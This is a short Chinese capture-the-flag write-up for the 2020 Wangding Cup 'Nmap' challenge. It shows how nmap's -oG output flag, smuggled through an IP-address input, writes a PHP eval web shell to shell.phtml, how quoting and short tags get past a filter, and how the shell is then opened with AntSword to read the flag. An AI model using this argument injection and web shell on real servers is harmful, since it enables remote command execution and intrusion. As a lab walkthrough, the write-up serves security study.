[网鼎杯 2020 朱雀组]Nmap
[网鼎杯 2020 朱雀组]Nmap
类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1
nmap 命令将扫描结果保存在文件里面:
例如:将nmap 127.0.0.1的结果保存在test.txt里面
nmap 127.0.0.1 -oN test.txt
nmap其他写文件命令:
-oN (标准输出)
-oX (XML输出)
-oS (ScRipT KIdd|3 oUTpuT)
-oG (Grep输出)
-oA (输出至所有格式)
这样我们就能写shell
<?php @eval($_POST["cmd"]);?> -oG shell.php
回到题目测试得到:
用phtml代替php仍然不行
查看了一下师傅们的WP,发现和[BUUCTF 2018]Online Tool一样
改为
' <? @eval($_POST["cmd"]);?> -oG shell.phtml '
查看写入的文件,即访问shell.phtml:
然后用蚁剑连接
主目录下发现flag
分类:
网安 / 题库 / BUU
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具